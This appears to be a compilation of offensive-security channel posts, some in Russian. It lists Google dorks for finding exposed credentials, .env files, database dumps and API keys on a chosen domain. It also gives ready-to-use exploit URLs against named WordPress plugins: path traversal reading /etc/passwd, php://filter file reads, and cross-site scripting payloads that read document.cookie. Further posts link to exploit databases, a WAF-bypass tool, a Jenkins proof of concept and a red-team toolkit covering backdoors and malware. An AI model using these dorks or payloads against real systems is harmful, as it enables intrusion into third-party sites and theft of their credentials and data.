⚡️ 6000+ Private Nuclei Templates ⚡️

#BugBounty #Nuclei_Templates

#IDAPro #Reverse_Engineering

CVE Hunting Made Easy

https://projectblack.io/blog/cve-hunting-at-scale/

Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻

1. Discovering Exposed Files:
   - intitle:"index of" "site:target.com"
   - filetype:log inurl:log site:target.com
   - filetype:sql inurl:sql site:target.com
   - filetype:env inurl:.env site:target.com

2. Finding Sensitive Directories:
   - inurl:/phpinfo.php site:target.com
   - inurl:/admin site:target.com
   - inurl:/backup site:target.com
   - inurl:wp- site:target.com

3. Exposed Configuration Files:
   - filetype:config inurl:config site:target.com
   - filetype:ini inurl:wp-config.php site:target.com
   - filetype:json inurl:credentials site:target.com

4. Discovering Usernames and Passwords:
   - intext:"password" filetype:log site:target.com
   - intext:"username" filetype:log site:target.com
   - filetype:sql "password" site:target.com

5. Finding Database Files:
   - filetype:sql inurl:db site:target.com
   - filetype:sql inurl:dump site:target.com
   - filetype:bak inurl:db site:target.com

6. Exposed Git Repositories:
   - inurl:".git" site:target.com
   - inurl:"/.git/config" site:target.com
   - intitle:"index of" ".git" site:target.com

7. Finding Publicly Exposed Emails:
   - intext:"email" site:target.com
   - inurl:"contact" intext:"@target.com" -www.target.com
   - filetype:xls inurl:"email" site:target.com

8. Discovering Vulnerable Web Servers:
   - intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
   - intitle:"Index of /" "Apache Server" site:target.com
   - intitle:"Welcome to nginx" site:target.com

9. Finding API Keys:
   - filetype:env "DB_PASSWORD" site:target.com
   - intext:"api_key" filetype:env site:target.com
   - intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com

10. Exposed Backup Files:
    - filetype:bak inurl:backup site:target.com
    - filetype:bak inurl:backup site:target.com
    - filetype:zip inurl:backup site:target.com
    - filetype:tgz inurl:backup site:target.com

Replace target.com with the domain or target you are focusing on.

#GoogleDorks
#BugHunting
#OSINT

#sqlmap #CheatSheet #By_HTB

sploitify.haxx.it

Curated list of public server-side exploits. Search by keyword, filter by vulnerability type, service affected and OS. Detailed description for each exploit (with PoC, Nuclei template or Metasploit module).

Deep Dive into Discord: OSINT Techniques (by Nina Maelainine)

- Discord Server Directories
- Bot Directories and Resources
- Specialized Tools

https://medium.com/@ninamaelainine/deep-dive-into-discord-osint-techniques-00534bf69371

#osint #socmint

https://github.com/stamparm/identYwaf

#WAF #Bypass #Tool

CVE-2024-43044 Jenkins
*
WriteUP
*
POC exploit

#jenkins

Прекрасное в мире плагинов WordPress
*
simple-image-manipulator

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery

/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer

/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

#Command_Injection #CheatSheet #By_HTB

All Red Team

Большая подборка как наступательных так для защиты инструментов, повышение привилегий Linux, Windows, сети, , бэкдоры, malware, горизонтальное, боковое движение, закрепление и т.д..

https://github.com/Ondrik8/RED-Team

#статьи_ссылки_scripts

GitHub
GitHub - Ondrik8/RED-Team
Contribute to Ondrik8/RED-Team development by creating an account on GitHub.

⚙️ Subdomain Generator

If you want to create subdomains quickly, try this site.

🔗 Source:
https://husseinphp.github.io/subdomain/

#subdomain #generator #bugbounty #web